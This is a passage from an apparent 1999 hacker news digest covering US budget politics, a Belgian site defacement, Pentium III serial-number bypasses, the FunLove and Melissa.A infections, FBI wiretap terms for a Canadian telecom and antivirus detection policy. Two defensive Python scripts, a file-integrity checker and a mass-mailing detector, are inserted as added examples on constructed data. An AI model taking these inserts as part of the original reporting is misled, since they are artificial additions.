           Looking back, Democrats are happy about one thing that
      Congress didn't do -- remove Mr. Clinton from office after his
      impeachment last December. His trial in the Senate ended Feb.
      12 without the necessary two-thirds vote to oust him.
           Asked what he thought was Congress' single-biggest
      achievement this year, Senate Minority Leader Tom Daschle
      said, "In a strange sort of way, I think it's probably the
      successful handling of the impeachment process. There was so
      much riding on it."
           While Congress may have put the impeachment behind it,
      there is still a healthy dislike for the Clintons in evidence. Just
      Thursday the House deleted from the budget a White House
      request, championed by first lady Hillary Rodham Clinton, for $3
      million for a music museum in New York, where she is
      contemplating a run for the Senate.
           Mr. Daschle said the Senate's defeat of the Comprehensive
      Test Ban Treaty was the worst moment of the session, calling it
      "an embarrassment to the country."
           Republicans consider the vote important, saying the treaty
      would have weakened the nation's defenses by throwing into
      doubt the reliability of the U.S. nuclear stockpile.
           From a fiscal perspective, Republicans ducked the reality
      they are spending about 5 percent more in fiscal 2000 than last
      year. They chose instead to focus on victories within the overall
      budget, such as protecting Social Security funds from being used
      for the general budget.
           At a rally of House Republicans Thursday night after the
      vote, Rep. Jennifer Dunn of Washington said the Social Security
      issue will resonate with women.
           "Women live longer than men, and yet they retire on fewer
      dollars," Mrs. Dunn said. "The security in their lives will be there
      when they get to retirement age."
           Almost by accident, Republicans hit on a popular feature this
      year that may become part of future budgets -- across-the-board
      cuts aimed ostensibly at eliminating government waste and
      fraud.
           The idea was proposed earlier this year by Rep. John R.
      Kasich, Ohio Republican and chairman of the House Budget
      Committee, but was largely ignored until late in budget
      negotiations when the GOP needed to save several billion dollars
      to balance the budget. Mr. Clinton and congressional Democrats
      fought a 1 percent cut but relented at 0.38 percent, and
      Republicans are finding that constituents like the idea.
           "It's very reasonable, it's fair and it's an effective
      management tool," said Rep. Asa Hutchinson, Arkansas
      Republican. "We'll come back and try it again next year."
           Defense spending was a big reason for the overall budget
      increase. After years of defense cuts under Mr. Clinton,
      Congress this year appropriated $268 billion for the military --
      about $17 billion more than last year and more than Mr. Clinton
      requested.
           "This year, we Republicans can be very proud that we took a
      critical first step towards addressing the needs of our
      long-ignored defense structure," said Rep. Tillie Fowler, Florida
      Republican and a member of the Armed Services Committee.
           House Majority Leader Dick Armey, Texas Republican, said
      that in addition to increasing defense spending and reducing the
      national debt by $130 billion, the Republican-led Congress
      thwarted Mr. Clinton's proposals for more than 70 different tax
      increases.
           "All of those I think are reasons for us to be very pleased
      with a good year's work," Mr. Armey told reporters.
           With only a five-vote majority in the House, Republicans said
      they had little choice this year but to compromise with the
      administration on a variety of issues. Although overall spending
      increased significantly, the GOP said it was victorious in
      curtailing Mr. Clinton's budget priorities much more than last
      year.
           Said Sen. Paul Coverdell of Georgia, secretary of the Senate
      Republican Conference, "The wonder to me is, given the limited
      beachhead -- we've never had what you'd call a decisive
      majority in the House, an organizational majority but not a
      governing majority in the Senate, we don't have the presidency --
      the wonder is we've come so far."
           Although Republican lawmakers did give in to Mr. Clinton's
      request to pay about $1 billion in U.N. dues, they won a
      provision for which they had been fighting since 1994 --
      restricting foreign aid from being used for family planning
      services overseas.
           "This seems to a lot of people like a small thing . . . but for
      five years we tried to win on that issue, and this year we by and
      large got Ronald Reagan's policy back into the law," Mr. Armey
      said.
           On education, although Republicans acquiesced to Mr.
      Clinton's demand to continue funding his program to hire 100,000
      teachers, the GOP won concessions from the White House to
      funnel some of the money for teacher certification.
           The Senate in October passed, for the third time in four
      years, a ban on "partial birth" abortions, but again failed to
      achieve enough votes to override Mr. Clinton's certain veto. The
      House has yet to take up the issue.

      @HWA
      
29.0  The state of the net in Bulgaria
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Contributed by Zym0t1c
      
      BRUSSELS | Nov 19 1999 - A hacker called g-RaX defaced both websites of our
      Belgian State Council and our Treasury...  g-RaX left some small notes
      referring to our phone company (Belgacom), probably because of the high
      internet prices, and to the famous Belgian writer Herman Brusselmans who has
      been charged because he sort of insulted An Demeulemeester, a (great)
      Belgian fashion designer, in his latest book.  Screw them!  I love his
      books...
      
      The point is that the State Council is not impressed by this burglary...
      Both websites were hosted on stand-alone computers which weren't connected
      at all with their internal network, so g-RaX formed no threats...
      However, the State Council is pressing charges against g-RaX.

      Belgian State Council: http://www.raadvst-consetat.be/
      Belgian Treasury: http://treasury.fgov.be/
      
      (Neither site was defaced at the time I received this email - Ed)

      @HWA
      
30.0  More on the PIII chip ID
      ~~~~~~~~~~~~~~~~~~~~~~~~
      
      http://www.heise.de/ct/english/99/05/news1/
      
      Christian Persson 

      Pentium III serial number is soft switchable after all 

      Intel's privacy strategy changed again 

      The controversial serial number of the new Pentium III processors can be 
      read on the quiet after all. Contrary to Intel's description so far, the 
      system architecture allows for individual identification by software 
      tricks without a user's explicit allowance or notice. 

      Intel's new technique for securing E-Commerce transactions already caused 
      quite a stir as the Pentium III presentations approached. Privacy 
      advocates expected the readable serial number to act as a "permanent 
      cookie" and to produce the completely transparent surfer. The processor 
      manufacturer appeased with the guarantee, the user would have full control 
      whether he would allow the read-out of the serial number. Once switched 
      off, the corresponding processor command could not be activated until the 
      next cold start.

      This description has proved wrong. The processor expert of c't magazine, 
      Andreas Stiller, has figured out a procedure to switch on the command for 
      reading out the serial number by software. This procedure is based on 
      specific features of the system architecture that are documented. They 
      would have got around in cracker circles sooner or later. A spokesperson 
      from Intel confirmed upon inquiry by c't, that the serial number can be 
      re-activated this way.

      Intel's solution is a renewed correction of announcements how privacy in 
      spite of the serial number could be guaranteed: whereas only a software 
      tool for switching the serial number on and off was intended so far, now 
      the PC manufacturers are encouraged to integrate the configuration of the 
      switching into the BIOS. This way, the switching on by software could be 
      prevented. Earlier Intel had rejected this method with the argument, 
      changes in the BIOS setup could not be expected from untrained users.

      Intel said that the BIOS manufacturers had been informed correspondingly. 
      Also, they had been equipped with software samples. It remains to be seen, 
      how many manufacturers will be able to incorporate appropriate BIOS 
      functions into the first delivered Pentium III systems and how they are 
      configured by default. To top it all, the new privacy concept has holes, 
      too: after all, the BIOS setting has to be stored in the CMOS memory. 
      Someone who knows the respective BIOS very well can crack this, too. (as) 

      Addendum

      The wording "A spokesperson from Intel confirmed upon inquiry by c't, that 
      the serial number can be re-activated this way" in the above text has been 
      taken as an acknowledgement, that the software developed by c't has been 
      checked by Intel. This is not the case. Actually, the spokesperson made a 
      statement about the procedure that c't described to an Intel specialist. 
      
      -=-
      
     Software claims to undo Pentium III fix 
     By Michael Kanellos and Stephanie Miles
     Staff Writers, CNET News.com
     March 10, 1999, 6:30 p.m. PT 

     Canadian software developers say they have created a program that can 
     obtain the Pentium III processor serial number despite the privacy 
     protection measures taken recently by Intel. 

     Zero Knowledge Systems of Montreal said today that it has developed an 
     ActiveX control that can retrieve the serial number under certain 
     circumstances, even after a software repair released last month by Intel 
     has disabled the feature and ostensibly "hid" the number from prying eyes. 

     The Pentium III serial number has turned into a public-relations nightmare 
     for the world's largest chipmaker. Although Intel included the number in 
     the chip as a way to improve Internet security, it has drawn protests from 
     privacy advocates who say it provides hackers with an opportunity to obtain 
     sensitive information. 

     Zero Knowledge's control essentially exploits the approximate 15-second gap 
     between the time a Pentium III computer is turned on and exposes the 
     processor serial number and when the software repair kicks in and covers it 
     up. 

     The control tricks the computer into crashing. Then, as the machine is 
     rebooted, Zero's software grabs the number before the software utility has 
     a chance to disable it again. 

     "It simulates a crash and could be attached to a virus, hidden inside an 
     email attachment, shareware--any way that people get hostile code onto your 
     machine," Zero Knowledge president Austin Hill said. The ActiveX control 
     grabs the serial code upon reboot, Hill said, and places it in a cookie 
     file that can be read by Web sites. 

     The Pentium III includes a serial code hardwired into the chip, along with 
     incremental improvements in speed and multimedia instructions. 

     Privacy and consumer rights groups are up in arms over the new feature, 
     which they say can provide an easy way for unscrupulous marketers and 
     hackers to track users based on their surfing habits. Some groups have 
     called for a boycott of Intel, while others, including the Center for 
     Democracy and Technology, the ACLU, and the Electronic Privacy Information 
     Center, are meeting with the FTC to pursue an investigation into the serial 
     code. 

     Intel included the feature as an additional security precaution for 
     e-commerce and to aid corporations tracking technology assets. The number 
     is "on," or can be read by a distant server, when the computer is turned 
     on. Intel has shipped a software utility to PC makers that turns the serial 
     code off. 

     For greater security, manufacturers can also disable the code in the BIOS, 
     or boot-up software. The BIOS patch hides the serial number at a much 
     earlier point in time. 

     In addition, Intel confirmed today that certain mobile Pentium II and 
     Celeron processors also contain the controversial serial code. 

     Zero's hack differs from a German technology publication's proposed method of 
     getting around the disabling software utility reported earlier. The 
     magazine c't postulated that the serial code could be read upon awakening 
     from energy-saving "deep sleep" mode, Hill said. 

     Intel has not yet seen Zero's software utility, and declined to comment on 
     whether the hack actually disables the serial code utility. But as when c't 
     pointed out that the software utility could be bypassed, company spokesman 
     George Alfs noted that all software can be hacked. "We would want to look 
     at the code before we make a comment on that," Alfs said. "But the end user 
     always needs to be aware of malicious software." 

     Zero-Knowledge recommends that consumers make certain that the serial code 
     is disabled in the BIOS, Hill said. "Intel built the serial number and was 
     surprised by how seriously people take their privacy," Hill said. "They 
     said 'theoretically it may be broken'--it turns out it's not that 
     theoretical after all." 

      
     @HWA
      
      
31.0  Security Lawsuits Next After Y2K 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Weld Pond 
      Fred Smith, an attorney at Panagakos and Wirth, Santa
      Fe, N.M., seems to think that lawsuits regarding software
      security in e-commerce will be the next big thing after
      Y2K. (Wonder how the Uniform Commercial Code that
      exempts all software from any liability will figure into
      these lawsuits.) 

      CMP Techweb       
      http://www.techweb.com/wire/story/TWB19991117S0005
      
      Security Lawsuits To Replace Y2K Litigation
      By Mary Mosquera, TechWeb
      Nov 17, 1999 (8:13 AM)
      URL: http://www.techweb.com/wire/story/TWB19991117S0005 
      
      Washington, D.C. -- Lawsuits involving computer security in e-commerce 
      will explode after Y2K litigation runs out of steam, which could be 
      quicker than originally believed. It appears that the deluge of Y2K 
      lawsuits will not happen because of legislation that protects companies 
      that share information about their Y2K vulnerabilities and limits on 
      litigation related to problems caused by Y2K computer glitches.

      Instead, lawsuits may be in response to computer security guarantees that 
      failed or lapses in security within a network because some of those 
      responsible may not know enough, said Fred Smith, an attorney at Panagakos 
      and Wirth, Santa Fe, N.M. There may also be more typical fraud in 
      e-commerce, such as non-performance of contract, credit card fraud, or one 
      company falling victim to a fraudulent but seemingly legal virtual 
      venture, he said.

      Speaking at the Computer Security Institute's conference here, Smith said 
      lawyers want to jump into the sphere of e-commerce litigation.

      "But the legal process is not working," he said. "Developing new law won't 
      catch up with the speed of technology." 

      As a result, companies doing business online need to include as part of 
      their computer security plans the ability to collect digital evidence that 
      can be used to defend themselves, to prosecute, or to use if they are a 
      witness, said Mark Pollitt, chief of the FBI's computer analysis 
      response team.

      But companies have no best practices or standards yet on which to develop 
      their network security. And the judicial system has no set of statutes 
      addressing problems particular to security in e-commerce, Smith said.

      It is all new territory for companies to consider how secure they can make 
      their networks without privacy implications, how to collect digital 
      evidence that would be clear and stand up in court, and how to consider 
      other countries' laws since so much of e-commerce is global, Pollitt 
      said. 

      "Companies have to start thinking about being evidence gatherers and that 
      they will sue or be sued at some time," Smith said. 

      Evidence -- which may be e-mails, digital images, or a network security
      plan -- must be able to be presented as a story in court so attorneys, judges, 
      and juries can understand, Smith said. 
      
      @HWA
      
32.0  Another Singaporean Cyber Intruder Pleads Guilty 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by no0ne 
      18 year old Peng Yuan Han, an Anglo-Chinese Junior
      College student, pleaded guilty to unauthorized use of a
      computer service, unauthorized access and
      modifications to a computer, and abetting unauthorized
      access. He admits to having electronically broken into
      the systems of the National Computer Board (NCB),
      Ministry of Education (MOE) and Nanyang Technological
      University (NTU). (It would be interesting to see what
      would happen if someone actually plead innocent and
      fought such a charge.) 

      The Straits Times 
      http://straitstimes.asia1.com.sg/cyb/cyb1_1117.html
      url not found - Ed
      
      @HWA
      
33.0  SingCERT Releases Year to Date Stats 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/ 


      contributed by no0ne 
      SingCERT has released statistics on the online threats
      that have been reported to it up to October of this
      year. They have reported over seventeen different
      viruses infecting Singaporean users with over 400
      victims from Chernobyl alone. 49 cases of illegal
      scanning had been reported and 27 cases of
      unauthorized intrusions. (Interesting but why are the
      numbers so low?) 

      Straits Times
      http://straitstimes.asia1.com.sg/cyb/cyb2_1118.html
      Straits Times - Yes, they had two stories      
      http://straitstimes.asia1.com.sg/cyb/cyb1_1118.html
      
      wtf. urls not found again ... - Ed
      
      @HWA
      
34.0  Canadian Telecom Firm Gets Security Clearance 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by cult hero 
      TMI Communications Inc. will be the first to offer
      satellite telecommunications services in the U.S. market.
      They have been granted approval after they agreed to
      allow US law enforcement agencies to install wiretap
      capability into their systems. The agreement came after
      the US agencies agreed not to spy on Canadian
      citizens. 

      Canoe        
      http://www.canoe.ca/MoneyNewsTechnology/sept13_tmisatellite.html
      
      Monday, September 13, 1999

      Technology News

      TMI sets precedent with U.S. deal 

      Wins security clearance: Telecom firm
      agrees to wiretaps -- but not on Canadians 

           

      By PETER MORTON 
      The Financial Post

        WASHINGTON - A tiny Canadian satellite communications
      company will be the first foreign firm to receive top security
      approval from the FBI to operate a telecommunications
      business in the United States after agreeing to allow U.S.
      security agencies to wiretap its service. 

        The precedent-setting deal, to be signed today, will soon allow
      TMI Communications Inc. to offer satellite telecommunications
      services in the U.S. market, Larry Boisvert, TMI's chief
      executive, confirmed in an interview. 

        "If you want to provide telecommunications in the U.S. you
      have to be prepared to meet the security required as
      determined by the FBI and the Department of Justice," Mr.
      Boisvert said. 

        Even though it will operate the service from Canada, TMI
      agreed to put a digital switch in the United States that would
      give FBI and other U.S. security agencies the ability to listen in
      on satellite calls or copy data, such as financial records, as
      required by new federal laws that will force all U.S. mobile
      communications companies to do the same by next June. 

        As first reported by the National Post in June, the FBI had
      blocked TMI from getting a Federal Communications
      Commission licence because it was worried that criminals or
      terrorists would use foreign-based telecommunications
      companies to avoid wiretaps. The FBI has complained it can
      not easily tap phonecalls going through foreign countries. 

        The new agreement, which comes after 17 months of
      negotiations, would put TMI's switch on U.S. soil, something
      the FBI plans to demand of any other foreign telecom company
      wanting to offer services in the United States as part of the
      1994 Communications Assistance for Law Enforcement Act,
      said Mr. Boisvert. 

        "It's going to cost us to do business in the U.S.," he said. "But
      if you're going to play in someone else's market, you got to be
      CALEA compliant." 

        A key part of the two agreements being signed today includes
      one between Canada and the U.S. that prohibits the FBI and
      any other security agency from tapping the calls being made by,
      or to, Canadian citizens. 

        Ottawa had balked at giving the FBI blanket access, saying it
      wanted to protect the privacy of Canadians. 

        Mr. Boisvert insisted the reason the negotiations took so long
      was not because the U.S. government had security concerns
      about Telesat or Canada. Rather, he said, the Department of
      Justice was being extraordinarily careful because the TMI deal
      would be the model for all other foreign telecommunications
      companies wanting access to the U.S. market. 

        The United States and 130 other countries agreed in February
      1997 to open their telecommunication markets to foreign
      competition. 

        At the time, however, the United States insisted its security
      concerns had to be met first, but did not spell out what that
      meant until TMI became the first foreign telecommunications
      company to apply for an FCC licence a year later. 

        "Security became the key issue," said Mr. Boisvert. "I suspect
      this will be a surprise to a lot of others waiting behind us." 

        Besides TMI, which is owned by Telesat Canada Inc. and
      BCE Inc., Globalstar Canada LP, a partnership of U.S.
      Globalstar and Canadian Satellite Communications, is also
      looking to offer U.S. telephone service using Canadian
      facilities. 

        TMI is hoping to be the first out of the gate to not only offer
      conventional satellite telephone services, but also to get into two
      new areas in Canada and the United States -- one involving
      data transmission and the second called asset management. 

        Mr. Boisvert said TMI is about to roll out the second service
      in Canada. It essentially involves placing tiny transmitters on
      everything from railway cars to trucks to allow companies to
      know exactly where their goods are anywhere in the country. 

        In addition, TMI is talking to major U.S. utilities about
      installing the devices in homes and businesses so they can
      remotely track electricity use. 

        "You don't have to send someone to the home to read the
      meters," he said. "The applications are enormous." 

        The deal being signed today clears the way for TMI to
      receive an FCC licence after pledging to have the new security
      features in place before next June. 

        The FCC was worried that demands by the FBI and the
      Department of Justice would be so onerous that no foreign
      telecommunications company would want to compete in the
      U.S. market, something that could set the stage for retaliation
      against U.S. companies around the world.

      @HWA
      
35.0  Dell Gets Some FunLove 
      ~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Evil Wench 
      The production systems of Dell Computers' Limerick,
      Ireland plant were infected with the FunLove virus
      causing the plant to shut down for two days and a
      recall of 12,000 systems. No viruses were later found
      on customer systems. 

      Irish Times      
      http://www.ireland.com/newspaper/front//1999/1118/fro3.htm
      
      Virus at Dell's Limerick plant costs firm millions


     By Madeleine Lyons and Éibhir Mulqueen

     A virus in the production systems of computer giant Dell's
     Limerick plant is understood to have cost the company millions
     of pounds.

     Work at the complex, which employs 3,400 people, was
     suspended for at least two working days and 12,000 computer
     units were recalled for checking.

     The so-called FunLove virus was identified in Dell's production
     process last Thursday afternoon. It was discovered in systems
     used to install software in newly-built computers.

     Production was shut down immediately and 12,000 units, which
     the company calculated may have been affected, were recalled.
     Dell builds computers to order and delivers them automatically
     on completion.

     According to a spokeswoman for Dell, only 500 units had
     reached their final destination and each of the customers
     involved was contacted by the company. These units - and the
     remaining 11,500 computers in transit - were checked over the
     weekend and all were found to be free of the virus. Normal
     production resumed on Monday afternoon.

     "When the virus was detected first, we had to take immediate
     precautions to ensure the shipped units were not contaminated,"
     the spokeswoman said.

     Dell refused to put a figure on the cost of the disruption but one
     industry source estimated that it may have cost as much as £14
     million. The spokeswoman said production was not scheduled
     over the weekend because the company had just completed its
     latest quarter involving around-the-clock operations.

     Dell now plans to make up the lost production hours through
     overtime and weekend work. According to the company, orders
     placed for desktop computers since Monday will be delayed by
     two days, while the estimated wait for other products is
     expected to be slightly longer.

     The FunLove virus infects both desktop computers and
     computer servers running Windows 95, 98 and Windows NT
     operating systems. As it spreads it increases the size of the files
     it infects by placing a copy of itself at the end of the infected
     file. When the file is opened under the basic operating system
     DOS, it launches the message "Fun Loving Criminal".

     Anti-virus companies said last week that FunLove would be
     easy to control as long as standard anti-virus procedures were
     implemented. Dell says it installed a "fix" early on Thursday and
     the virus was detected in internal systems that afternoon.

     A number of Irish companies took measures last week to
     protect their computer systems against the same virus. They
     included Bank of Ireland, AIB, Ericsson, Microsoft, Eircom, the
     Revenue Commissioners and Smurfit.
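
     The article says FunLove enlarges each file it infects by appending a
     copy of itself, and that it was found on the systems that install
     software onto new machines. The sketch below is an added example, not
     part of the article and not Dell's tooling: it baselines the
     executables on such a share and flags any that have since grown. The
     extension list, file names and byte counts are constructed assumptions.

```python
import hashlib
import os
import tempfile

# Assumption: which extensions count as executable content on the share.
EXECUTABLE_EXTS = {".exe", ".scr", ".ocx"}


def fingerprint(path):
    """Return (size, sha256 hex digest) of one file, read in chunks."""
    digest, size = hashlib.sha256(), 0
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(65536), b""):
            digest.update(chunk)
            size += len(chunk)
    return size, digest.hexdigest()


def build_manifest(root):
    """Map each executable's path (relative to root) to its fingerprint."""
    manifest = {}
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            if os.path.splitext(name)[1].lower() in EXECUTABLE_EXTS:
                full = os.path.join(dirpath, name)
                manifest[os.path.relpath(full, root)] = fingerprint(full)
    return manifest


def verify(root, baseline):
    """Compare the share against the known-good baseline.

    Returns sorted (path, verdict, size_delta) tuples. "grown" is what an
    appending infector leaves behind: the content changed and the file is
    larger than the copy that was signed off.
    """
    current = build_manifest(root)
    findings = []
    for rel, (old_size, old_hash) in baseline.items():
        if rel not in current:
            findings.append((rel, "missing", -old_size))
            continue
        new_size, new_hash = current[rel]
        if new_hash != old_hash:
            verdict = "grown" if new_size > old_size else "modified"
            findings.append((rel, verdict, new_size - old_size))
    for rel in set(current) - set(baseline):
        findings.append((rel, "unexpected", current[rel][0]))
    return sorted(findings)


def demo():
    """Run the check on constructed stand-in files (no real malware)."""
    with tempfile.TemporaryDirectory() as root:
        samples = {"setup.exe": b"MZ" + b"\x00" * 510,
                   "tool.exe": b"MZ" + b"\x11" * 254,
                   "readme.txt": b"not tracked"}
        for name, body in samples.items():
            with open(os.path.join(root, name), "wb") as handle:
                handle.write(body)
        baseline = build_manifest(root)          # taken while known clean

        with open(os.path.join(root, "setup.exe"), "ab") as handle:
            handle.write(b"\xcc" * 4096)         # bytes appended after sign-off
        with open(os.path.join(root, "extra.exe"), "wb") as handle:
            handle.write(b"MZ" + b"\x22" * 14)   # file that was never approved
        return verify(root, baseline)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

     The baseline has to be stored somewhere the imaging systems cannot
     write to, otherwise an infection can be baselined along with the files.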
     
     @HWA
     
36.0  Melissa Hits Disney 
      ~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by turtlex 
      Melissa is still around wreaking havoc, this time it was
      Disney Corporation. A variant of Melissa known as
      Melissa.A infected an internal memo which it then
      proceeded to mail out to several members of the
      press. Luckily the memo did not reveal any corporate
      secrets, this time. 

      ZD Net      
      http://www.zdnet.com/zdnn/stories/news/0,4586,2396724,00.html?chkpt=zdhpnews01
      
      
      Spies hit Disney? No, just Melissa
      By Rob Lemos, ZDNN
      November 17, 1999 6:07 PM PT
      
      The Melissa virus was behind an e-mail spam from Walt Disney Co. Wednesday.
      
      Disney (NYSE: DIS) inadvertently spammed a host of press members with an internal memo,
      because the Melissa.A virus, which had infected the memo, mailed out the attachment to a list of
      people from the company's address book. 
      
      The memo -- from Disney Vice Chairman Sandy Litvack -- described
      policy changes in the dates that employees (called "cast members" in
      Disney-speak) could attend the company's trademark theme parks for no
      charge.
      
      While the incident doesn't appear to have caused any harm, it underscores the potential for computer
      viruses -- especially macro viruses -- to not only damage data, but to inadvertently publicize it as
      well.
      
      "There is a danger that any type of virus that sends out e-mail, especially macro viruses, could do
      something like this," said Darren Kessner, a senior virus researcher at Symantec Corp.'s Anti-virus
      Research Center.
      
      The Melissa virus, which struck late last March, spawned a number of copycats, including Melissa.A
      -- the variant that hit Disney.
      
      When an infected document is opened, the virus infects the Word template file -- the starting point
      for all new Word documents -- and mails the currently open document to the top 50 addresses in the
      Microsoft Outlook address book.
      
      Systems that are set to 'medium' or 'high' security will notify the user that a macro is being run.
      Those systems that do not use Microsoft Outlook as a mail client will not send out the mass
      e-mailing. The variant does not destroy any data on the infected system.
      
      However, if a document is created on an infected system, mailed to another user, and opened with
      Microsoft Outlook, the new document will be sent to the top 50 addresses on the new system. This
      appears to be what happened with the Litvack document.
      
      Erik Wedin is one of two Disney employees who inadvertently sent out the infected document to a
      large number of press members. In an e-mail message to ZDNN, Wedin insisted that Disney uses
      anti-virus software. "Our I.S. team is trying to figure out why (the virus) wasn't caught," he wrote.
      
      "It's amazing that they didn't have more up to date anti-virus software in place," said Symantec's
      Kessner.
      
      While the incident highlights the danger of viruses causing information leaks at companies, Kessner
      downplayed the danger of viruses being intentionally used for industrial espionage. 
      
      "This is not the best way," he said. "Furthermore, most virus writers are not interested in the
      information they can get. They are more interested in getting their name out."
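
      The behaviour the article describes (one open document mailed to the
      top 50 address-book entries) leaves a recognisable pattern at the mail
      gateway: one sender, one attachment, dozens of distinct recipients
      within minutes. The detector below is an added example, not part of
      the ZDNN story; the log format, addresses and digests are constructed
      assumptions, and the default threshold of 50 comes from the article.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta


def parse_line(line):
    """Parse 'TIMESTAMP key=value ...' (a constructed log format)."""
    stamp, *fields = line.split()
    record = dict(field.split("=", 1) for field in fields)
    record["ts"] = datetime.strptime(stamp, "%Y-%m-%dT%H:%M:%S")
    return record


def find_mass_mailings(lines, threshold=50, window=timedelta(minutes=5)):
    """Flag (sender, attachment) pairs that reach `threshold` distinct
    recipients inside one sliding time window."""
    recent = defaultdict(deque)   # (sender, attachment) -> (ts, recipient)
    alerts = {}
    records = sorted((parse_line(l) for l in lines if l.strip()),
                     key=lambda r: r["ts"])
    for rec in records:
        if "att" not in rec:      # mail without an attachment is ignored
            continue
        key = (rec["from"], rec["att"])
        queue = recent[key]
        queue.append((rec["ts"], rec["to"]))
        while rec["ts"] - queue[0][0] > window:
            queue.popleft()       # drop deliveries older than the window
        distinct = {rcpt for _ts, rcpt in queue}
        if len(distinct) >= threshold and key not in alerts:
            alerts[key] = {"sender": rec["from"],
                           "attachment": rec["att"],
                           "recipients": len(distinct),
                           "first_seen": queue[0][0]}
    return list(alerts.values())


def sample_log():
    """Constructed gateway log: one burst plus ordinary traffic."""
    start = datetime(1999, 11, 17, 18, 0, 0)
    row = "{} from={} to={} att={}"
    lines = []
    # Burst: same attachment to 50 recipients in under a minute.
    for i in range(50):
        lines.append(row.format((start + timedelta(seconds=i)).isoformat(),
                                "staff1@corp.example",
                                f"press{i}@news.example", "sha256:aa11"))
    # Newsletter: same attachment to 60 recipients, ten minutes apart.
    for i in range(60):
        lines.append(row.format((start + timedelta(minutes=10 * i)).isoformat(),
                                "news@corp.example",
                                f"sub{i}@list.example", "sha256:bb22"))
    # Ordinary use: one document sent to three colleagues.
    for i in range(3):
        lines.append(row.format((start + timedelta(seconds=5 * i)).isoformat(),
                                "staff2@corp.example",
                                f"peer{i}@corp.example", "sha256:cc33"))
    # A message with no attachment at all.
    lines.append(f"{start.isoformat()} from=staff3@corp.example "
                 "to=peer9@corp.example")
    return lines


if __name__ == "__main__":
    for alert in find_mass_mailings(sample_log()):
        print(alert)
```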
      
      @HWA
      
      
37.0  How the Anti Virus Industry Works 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
      
      From HNN http://www.hackernews.com/

      contributed by RenderMan 
      So what exactly does it take for a piece of software to
      end up in a virus scanning package as something to be
      scanned for? Why is commercial spy software not
      scanned but freeware tools that do the same thing are?
      A new article in the Buffer Overflow section takes a look
      at the Anti Virus companies and what the criteria are. 

      Buffer Overflow             
      http://www.hackernews.com/orig/buffero.html
                                                            
      How the A/V Industry Works

      By: Renderman,
      Www.Hackcanada.com
      RenderMan@Hackcanada.com

      What do I remember most about DEFCON 7? The mosh pit
      of Anti-Virus employees at the release of BO2K. Several
      dozen A/V people from different companies, risking life,
      limb and large insurance deductibles to get their company
      the first samples of BO2K was one of the funniest things I
      remember. At the time it made sense to risk injury to get
      a copy, the media would reward the first company with a
      BO2K detection signature with immense amounts of free
      advertising, after all this was the latest and greatest
      Trojan/backdoor, right? Well, after seeing Dildog's
      presentation and the following open challenge to M$ to
      recall SMS server, the general description of BO2K
      changed. After initially trying BO2K on an isolated test
      machine to make sure I didn't screw myself, it has now
      become my primary method of remote administration on a
      multiple system 9X/NT network because it is just a damn
      good program. My opinion now; the anti-virus industry
      people didn't need to be there. This was a well designed
      remote control product that happened to be written by
      hackers, and as with any tool, in the wrong hands it can
      be dangerous. 

      In the months following defcon, products such as
      Softeyes (http://www.softeyes.com), and Investigator
      from Winwhatwhere (http://www.winwhatwhere.com/),
      and other products that are designed to do much of what
      the A/V industry says makes a program malicious are not
      scanned for. When a product can advertise "watches and
      records everything about every window that gains the
      focus. It records every keystroke, program name, window
      title, URL, User and Workstation and the optional 'Silent
      Install' feature will run the installation silently and invisibly"
      and not be scanned for, it begs the question, how do you
      decide? Also you may recall the problems that the folks
      over at NetBus had when they went commercial and
      started charging for their product. They had a hard time
      shedding the image of a hacking tool. This really rattled a
      lot of people's cages because the logic that was in use by
      the people who are saying certain programs are malicious
      does not make sense when you add these new programs
      to the mix. Just looking at C|net's technology terror guide
      (Technology Terrors) you can see the number of products
      that aren't on any A/V list that are as dangerous, if not
      more, than BO2K. 

      This whole thing boils down to the question; how do A/V
      companies decide what criteria makes a piece of code
      worth being scanned for? 

      Well, rather than rant on like others might do, I went to
      the source. I looked on A/V sites for a policy statement or
      a set of internal guidelines. Nothing found. So I sent a mail
      like any other customer to the customer support
      department (and if it existed, the A/V research
      department as well) of the major A/V companies,
      Symantec, NAI, AVP, Computer Associates, and Panda
      Software. There were others that could also qualify, but
      these are what you find most on store shelves. To all the
      companies I sent the same letter: 

           Dear Sir/Madam, 

           With recent events in the virus industry, it
           has become apparent to myself and many
           others that there seems to be a definite bias
           when it comes to how companies like yours
           determine what should and should not be
           scanned for. 

           By what policy do you decide what should be
           scanned for and eliminated and what is
           'legitimate'? After an examination of your web
           site, no policy statement could be found. Can
           you clarify by what criteria makes a product
           malicious or a legitimate product? 

           Thanks 

           RenderMan
           www.Hackcanada.com

      As you can see, the letter states my conundrum and the
      clarification I need, and I don't try to hide who I'm mailing
      as. I waited a couple weeks for the responses to
      accumulate and re-sent some that I did not receive
      responses from. In over two weeks I only received 3
      responses. 

      First was a very quick response from Symantec customer
      support from a gentleman who really was having a really
      bad day, I think, and was not happy to see me. Here is
      his message with my comments inserted: 

           I can assure you that Symantec has
           absolutely no bias towards any legitimate
           software developers (What makes a software
           developer legitimate, is there a license I'm
           not aware of? I thought anyone could code?)
           Arguments by some hackers that certain
           hacker tools are actually legitimate commercial
           software are themselves extremely biased to
           the point of not making any sense (I agree we
           are biased to a point just as you are, but
           what makes something a hacker tool or a
           mis-used administration tool?) A good news
           recent story about this subject is available for
           reading at this web page,
           http://www.msnbc.com/news/287542.asp.
           Both Symantec management and management
           at other Anti-Virus developers are quoted in
           this article about this subject. We really would
           not have anything further to add to these
           comments on this subject. (The article does
           not really answer what I was asking.) 

           Best regards,
           (name omitted)

      After not answering my original question, I responded
      because I thought they still had something they could
      add. This time I went and asked exactly how they decide
      what should and should not be detected and give an
